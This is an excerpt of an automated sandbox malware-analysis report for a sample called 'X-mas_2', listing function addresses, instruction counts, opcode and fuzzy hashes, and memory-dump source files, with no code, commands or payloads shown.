Opcode Fuzzy Hash: 3f2508813e6418bbb85c5464cf00bafe144524ef1e8a0a3f50558454acbc9b08
Instruction Fuzzy Hash: C66158B1D4531ACFCB14CF64C8A1ABAB7B1FF46320F1A8298D8466F391E3749841CB54

Function 0042CA35 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 596c9a500c2b211e0bede0dc7108b3830e98fe79128f0a5cf5a6a8000d0bd306
Instruction ID: 9cae756e44e46e412c6b7bae4618893f63236fa384344dc74c3a447ed554000f
Opcode Fuzzy Hash: 596c9a500c2b211e0bede0dc7108b3830e98fe79128f0a5cf5a6a8000d0bd306
Instruction Fuzzy Hash: 4761597020C3A18BD3198B3694A077F7FD09F97314F684A9EE4D65B381D6388946C79A

Function 0042CAF1 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4616abc86f5eec50a33f05d8b81670d6b12a01ee44a15341e545930cacdef31
Instruction ID: 91ec8ecf55fe5685fb4db376a75285eb36e4341672459a1fb700e153c465ee75
Opcode Fuzzy Hash: f4616abc86f5eec50a33f05d8b81670d6b12a01ee44a15341e545930cacdef31
Instruction Fuzzy Hash: 25616B7020C3A18BD3198F3694E077F7FD09F97714F684A9EE4C65B282D6388546C79A

Function 0042CB4C Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74faaaf9cd24d676a092b8e6f9ac3efb77d7115b5d8593a4af48d1d83e65560f
Instruction ID: a090848f6cc525cad24b9e20c821547faca872518ba63d46f27936152a4cd5de
Opcode Fuzzy Hash: 74faaaf9cd24d676a092b8e6f9ac3efb77d7115b5d8593a4af48d1d83e65560f
Instruction Fuzzy Hash: 73517C7020C3A14BD3198B3694E077F7FD09F97718F684A5EE4C65B281C6388546C79A

Function 02108387 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd4028bee268112b8478285942d36c744455609f38c639e4b339a3793cb114d4
Instruction ID: 08c922723fc9d9e181e634023e5f96df084b7f7563c422a5720d6d5374048a5e
Opcode Fuzzy Hash: dd4028bee268112b8478285942d36c744455609f38c639e4b339a3793cb114d4
Instruction Fuzzy Hash: 18613570948324CBDF24CF54C8D1BAAB7B2FF96324B198258D8856F3C5E3789551CBA4

Function 004308E0 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e3528b0a3b5b2d1b0721c0715f93a3f1cc7ad484ab942ba11314165fb739265
Instruction ID: 5b2891c8fe877119163b7f98e476f77a68e93a46c016bb1ad212271ab8b7413a
Opcode Fuzzy Hash: 5e3528b0a3b5b2d1b0721c0715f93a3f1cc7ad484ab942ba11314165fb739265
Instruction Fuzzy Hash: 97717A37649AD04BE3285E7C4C713A6BA934F97630F2D936EE9F54B3E2C5684D028345

Function 02110B47 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e3528b0a3b5b2d1b0721c0715f93a3f1cc7ad484ab942ba11314165fb739265
Instruction ID: 4122c99331f0eb432eaff99a56fcb61562e11da52dc1d90e7fd8f7905bb399b4
Opcode Fuzzy Hash: 5e3528b0a3b5b2d1b0721c0715f93a3f1cc7ad484ab942ba11314165fb739265
Instruction Fuzzy Hash: F2715C37A89AD04BD32C4A3C4C613AABA934B97134F1E87BEEDF14B3E1D67648458341

Function 0041D940 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c24a52d2344ba59c91023f4ae5247fefca46f4485c28eac47c4d84031731ef7e
Instruction ID: 469687be043b2f9f4970facd4e4c08c479ec777d83b0675a84ba9d55084d64b3
Opcode Fuzzy Hash: c24a52d2344ba59c91023f4ae5247fefca46f4485c28eac47c4d84031731ef7e
Instruction Fuzzy Hash: 18711573A4D9904BD328893C4C123AA6E934BD3334F2DC3AEE5B6873E5D56D48428349

Function 0042F7BC Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f27cd28c20e0b718978d2eadf5d52200c50729cfa5ec1e475a15264fa4dfe5b0
Instruction ID: a7f5e9c046c4957bb4a88c91f70171074d68fbe3518662ea52ef9577db1fb83e
Opcode Fuzzy Hash: f27cd28c20e0b718978d2eadf5d52200c50729cfa5ec1e475a15264fa4dfe5b0
Instruction Fuzzy Hash: 2DA1A161608FC08BD3159A3898943E7BFE25FA6324F188A7DD4FE473C6D678A409C716

Function 0210FA23 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f27cd28c20e0b718978d2eadf5d52200c50729cfa5ec1e475a15264fa4dfe5b0
Instruction ID: 8290f75f4daefc162838678fec5646ae9baaddecbd599438d4bd96b1289ae5bb
Opcode Fuzzy Hash: f27cd28c20e0b718978d2eadf5d52200c50729cfa5ec1e475a15264fa4dfe5b0
Instruction Fuzzy Hash: 1BA19F72608B808BD3258A3888943D7BFD25F96320F188A7CC4FA873D2D675A009CB52

Function 020FDBA7 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c24a52d2344ba59c91023f4ae5247fefca46f4485c28eac47c4d84031731ef7e
Instruction ID: d87a3d1e06697feb61d0075300db692e9f3752d17d9953152cb40ac4fc4a6dee
Opcode Fuzzy Hash: c24a52d2344ba59c91023f4ae5247fefca46f4485c28eac47c4d84031731ef7e
Instruction Fuzzy Hash: 3E716923A8AAC04BD3698A3C4C2137A7E934BD3230F2DC7AEE6F5877E5D56948019341

Function 0041AB00 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db39e290813564dad3724b79deb140b57ce3141e843a651e9f5f344617681626
Instruction ID: 10fdaf47f6b14bfbe331076cd5057ec1334350043aed3e0252b47af58e088c01
Opcode Fuzzy Hash: db39e290813564dad3724b79deb140b57ce3141e843a651e9f5f344617681626
Instruction Fuzzy Hash: 44613633B4AA804BD728CD3C5C513A67A930BD7330B2EC77EE6B58B3E5E56848524346

Function 00432B10 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1684320cec7a9cf7998564e3e50963ad1a149a90c03f316f8258aba6f7eab80
Instruction ID: 531981158a6f9b00caa3a14850ce91ceb08ed0e88ac49b002fa73ad3765a9f98
Opcode Fuzzy Hash: c1684320cec7a9cf7998564e3e50963ad1a149a90c03f316f8258aba6f7eab80
Instruction Fuzzy Hash: 56612733B149A14BC7288D3C4C112BEBA534B9A330F2E937BE975DB3E5C5684D014394

Function 00437DE0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a1a6866e3941fce45a46cc0b3d9800c7fca2611ad3657d096bf3e1dc041b0b5
Instruction ID: d2a2c762938f2fca4047324f4a8cb11edca21d1421b4f064fd9b2157b6ab5b48
Opcode Fuzzy Hash: 4a1a6866e3941fce45a46cc0b3d9800c7fca2611ad3657d096bf3e1dc041b0b5
Instruction Fuzzy Hash: FD515BB15087548FE324DF29D49475BBBE1BBC8318F044A2EE4E987351E779DA088F86

Function 02118047 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a1a6866e3941fce45a46cc0b3d9800c7fca2611ad3657d096bf3e1dc041b0b5
Instruction ID: ce608e6433f941503f5f34c321c7c4720848303aa68277dc32bbf5cf7587b09d
Opcode Fuzzy Hash: 4a1a6866e3941fce45a46cc0b3d9800c7fca2611ad3657d096bf3e1dc041b0b5
Instruction Fuzzy Hash: 25514AB16087548FE314DF69D89435BBBE1BB84318F158A2DE5E987350E379D6088B82

Function 0042F166 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96f01cf5a4a5fbc66146bff0ed73f2f4746840b49c526372884732bc62a942db
Instruction ID: e7deeb4d23eb94cd92ae027c1703fd029eee9cb96ffdb6be6668117e96043695
Opcode Fuzzy Hash: 96f01cf5a4a5fbc66146bff0ed73f2f4746840b49c526372884732bc62a942db
Instruction Fuzzy Hash: 3B71AF72605F808BD3289B398895397BBE2AFDA324F18CB6CD5FE873D5D63864058711

Function 0210F3CD Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96f01cf5a4a5fbc66146bff0ed73f2f4746840b49c526372884732bc62a942db
Instruction ID: 823529cc57ffc0ad1db86c833064b39ca7540c3b4478fe381dbf847d460c28f3
Opcode Fuzzy Hash: 96f01cf5a4a5fbc66146bff0ed73f2f4746840b49c526372884732bc62a942db
Instruction Fuzzy Hash: 04719072649B804BD3288B388895397BBD2AFDA320F19CB6CD5FA873D5D6386405CB51

Function 0211F837 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e86788e225d8ce609e190362df982618e6f6e291ba4fee68c26348297c1e8688
Instruction ID: f60d971f70ef08b4ee9b2ea70e31737d4088c92654ba5a36de54e8a2fdabbf4e
Opcode Fuzzy Hash: e86788e225d8ce609e190362df982618e6f6e291ba4fee68c26348297c1e8688
Instruction Fuzzy Hash: 4E41043279C3984BD708EE68C4D226EBBD6DBC5314F18843DE89687686D778D846C782

Function 0041DC90 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9d65a63d55dc101dab8d648e93d62fc17e84a733771b803c98110a43d2c3e35
Instruction ID: a4a710428683e853f361a46b908238cf8c95490b240be794243bc07d83d7b904
Opcode Fuzzy Hash: b9d65a63d55dc101dab8d648e93d62fc17e84a733771b803c98110a43d2c3e35
Instruction Fuzzy Hash: 82512872B49AD14BD32C8A3C5C202E67A930BE7230B2CC77FE5B18B3E9D5594C428349

Function 020FDEF7 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9d65a63d55dc101dab8d648e93d62fc17e84a733771b803c98110a43d2c3e35
Instruction ID: 4ba8f45a14f532e6a71c3a0b8bb4fb340472fb72a6200ad2427f3cc2b4ab3ee4
Opcode Fuzzy Hash: b9d65a63d55dc101dab8d648e93d62fc17e84a733771b803c98110a43d2c3e35
Instruction Fuzzy Hash: 5E512632B89AD14BD3688E3C9C2036A7A830BD7230B2DC77EEAB1877F5C9614845D341

Function 0042FDF9 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83e0a7b5798f50e51a594fe464790eb165e5a3dc9801e69e9e1483218ce4d000
Instruction ID: 91e01f7b1b83310294adf70ec6e42733a2de4c40d7ccdc23475bec5239df35d2
Opcode Fuzzy Hash: 83e0a7b5798f50e51a594fe464790eb165e5a3dc9801e69e9e1483218ce4d000
Instruction Fuzzy Hash: 3661E372709F804FD3258A3888943EBBBD25BD6224F598B7DD5FB473C6DA3864068712

Function 02110060 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83e0a7b5798f50e51a594fe464790eb165e5a3dc9801e69e9e1483218ce4d000
Instruction ID: 73e49e9a91fae0ed5c4405780f50c3a8024bf004a8f790dbfb481f0588e73d85
Opcode Fuzzy Hash: 83e0a7b5798f50e51a594fe464790eb165e5a3dc9801e69e9e1483218ce4d000
Instruction Fuzzy Hash: B761A372609F804FD3258A3888943EBBBD26BD6220F198B7CD5FB473D5DA356406C752

Function 0043EA80 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 194e4a91e1514fd88c03bb3a50c0e52568d82f3eb187bc583a51a911f9df439c
Instruction ID: 923e9729d5fc7ee5fd359d95a093cefa7cc461975f18bb850f02f0498ccbdfb7
Opcode Fuzzy Hash: 194e4a91e1514fd88c03bb3a50c0e52568d82f3eb187bc583a51a911f9df439c
Instruction Fuzzy Hash: C2413D32B183604BC724CF39889112BF7D69BCA204F19993EDCD6DB386D634ED068785

Function 020F6A8D Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 643816c903cc21a21c7dd058bbb26e4a57b802716aebfa47cef93a7e234dd310
Instruction ID: 26355abdd7a4b671f1577166d518659043be11e701892e9d2e11f0e4c881f3d1
Opcode Fuzzy Hash: 643816c903cc21a21c7dd058bbb26e4a57b802716aebfa47cef93a7e234dd310
Instruction Fuzzy Hash: 804162B2A543519BDB29CF14C840E3BB7B6AFE6304F19843CDA421B621D7329941CBC6

Function 02102AE4 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408c441d262a16b994e89faa159f98eef8b7716a8db9a793f72068f5f64a27a2
Instruction ID: 764884e24014e5a815602c2d092b4e90e8367f2aa05162273ea1bf960cc28e42
Opcode Fuzzy Hash: 408c441d262a16b994e89faa159f98eef8b7716a8db9a793f72068f5f64a27a2
Instruction Fuzzy Hash: 38412533B546128BD328CE79CC826AAB3D3A7C5328F1DC63CD865C72D1E77898458781

Function 0040D0FF Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 77174489fd0e67cff2231ae8560aed0271b4bae09d9f29f2eb73219c18e69b4e
Instruction ID: d0b61d9f81aa32698d78d86dd344cd119e6c94a8a483ab8c1dfd674f7c89a8c8
Opcode Fuzzy Hash: 77174489fd0e67cff2231ae8560aed0271b4bae09d9f29f2eb73219c18e69b4e
Instruction Fuzzy Hash: C2312A34A8A2009BD7198B68D4A193B77E1EF9E704F55183EC08773761C2369C07CB8A

Function 00437300 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31087603f6955c680b53001b2ded55fee9e1317aa71b55b8ead82521f35e458b
Instruction ID: 8d910ab3725aef525df7cf3e8056221471cb78519a605af281f7b590cc56def2
Opcode Fuzzy Hash: 31087603f6955c680b53001b2ded55fee9e1317aa71b55b8ead82521f35e458b
Instruction Fuzzy Hash: B7518F72E082558BD718CF68CC913AE7BE2AB99314F19C17DC491EB392D63C9901CB85

Function 00436554 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 443ba3fedd39c938272fbcc842cb084585534cd99fa60a876ac0daf18ed5a58c
Instruction ID: b29ca845dee0bd9e57349eb0122d191b14dd0e5c106a5fdaa3ab53071bb3bc5b
Opcode Fuzzy Hash: 443ba3fedd39c938272fbcc842cb084585534cd99fa60a876ac0daf18ed5a58c
Instruction Fuzzy Hash: DE512872E046568FEB04CF78CD9139EBBE2AB89314F1EC17DC451AB385DA7C89428B45

Function 021167BB Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e597354304619503f0acd7f5a2108622ff70e388f359532661c7de9d37406d65
Instruction ID: c98fe397856ff7c89ec5e5be2503c7692ac5a151d0dca145f3f9eb0c1cbf4f2a
Opcode Fuzzy Hash: e597354304619503f0acd7f5a2108622ff70e388f359532661c7de9d37406d65
Instruction Fuzzy Hash: B5511872E44659CFDB08CF68CC9139EBBE2AB89314F1E817CC451AB385D7798945CB81

Function 004398A0 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71a9930f6141a572d33e06cb3c5a38f27cfcee272b5f5079e0f2ab4ef3a0a6f8
Instruction ID: 0b4fe86eeb8762ab361a5b54057d890833e111ea9fd28b0abc4707cf8fce0a7e
Opcode Fuzzy Hash: 71a9930f6141a572d33e06cb3c5a38f27cfcee272b5f5079e0f2ab4ef3a0a6f8
Instruction Fuzzy Hash: 5C417CB2A043006BE7109E15DC41B3BB7A9DFC4704F19543DF98693351D679EC00C69B

Function 02119B07 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 747b2f3c7bc5b5d6a1f1c9dcb3c9602567afaf6685ff2b046d5c6c09c9f6a3c7
Instruction ID: 6d49425f80abd7eff6dc28ffacc60729cc941e74bcccb1da09a5167d56560732
Opcode Fuzzy Hash: 747b2f3c7bc5b5d6a1f1c9dcb3c9602567afaf6685ff2b046d5c6c09c9f6a3c7
Instruction Fuzzy Hash: 604139B2A88344AFE7149A14CC90F7BB7EADFC1708F19483CF99597250E731E840CA96

Function 020F68FF Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b386feac92044a6cc0dbb659dd27698f880e089b58b99bdf9f1f527719b91fc5
Instruction ID: cb0042d86a05da54b6eea3678d4a3dcc4fb231930262dc86db13ae2794f92f7a
Opcode Fuzzy Hash: b386feac92044a6cc0dbb659dd27698f880e089b58b99bdf9f1f527719b91fc5
Instruction Fuzzy Hash: 3131287498C3C18BD7968F39842073ABFE98F63600F18589CE4E25B692D76AC105DB67

Function 021051F8 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 716ee973c4cbceca4e81cdf79dd1d61833656acd0fa2f9d1998927d26708c93b
Instruction ID: 5c426f07678ea4dabdbf545e239e6abc25b7dc628de1d1fb5476fdc919694111
Opcode Fuzzy Hash: 716ee973c4cbceca4e81cdf79dd1d61833656acd0fa2f9d1998927d26708c93b
Instruction Fuzzy Hash: 14314B32698604ABC3249F7C9CC177A76D7FB85214F5D5139D9A0DB2A2E3B0C8018E89

Function 0041AD80 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a84865ad5c54ca8c24b5999745df1c13fc6cbfcb28eafabd1d82927ec86d330
Instruction ID: 98624231f7e5e9230921b97ae011ab3bf41f8733fbbdbc26380a3e149101f663
Opcode Fuzzy Hash: 3a84865ad5c54ca8c24b5999745df1c13fc6cbfcb28eafabd1d82927ec86d330
Instruction Fuzzy Hash: 893197B01493418BC714DF29D8616ABBBF1EF83364F144A1DE5D28B390E778C881CB8A

Function 020F501F Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b6d026172a9b436ce4c94b9573d7a7a3bf5cebd9f80676b7f3b60214e6f43a
Instruction ID: e2d40b6d872e032a30ea60548cd93d0972daacc2eef3b1ff9211e3e7a414a758
Opcode Fuzzy Hash: 63b6d026172a9b436ce4c94b9573d7a7a3bf5cebd9f80676b7f3b60214e6f43a
Instruction Fuzzy Hash: F341F2B19483419BD364DF28CC81BABBAA5FFC2324F058A2CE5998B790E7745401CB86

Function 020FAFE7 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a84865ad5c54ca8c24b5999745df1c13fc6cbfcb28eafabd1d82927ec86d330
Instruction ID: 042f762ce7ccce78262db4dde6069b5bcb3afb3b2f5d5d9560ff51cce4b8ee13
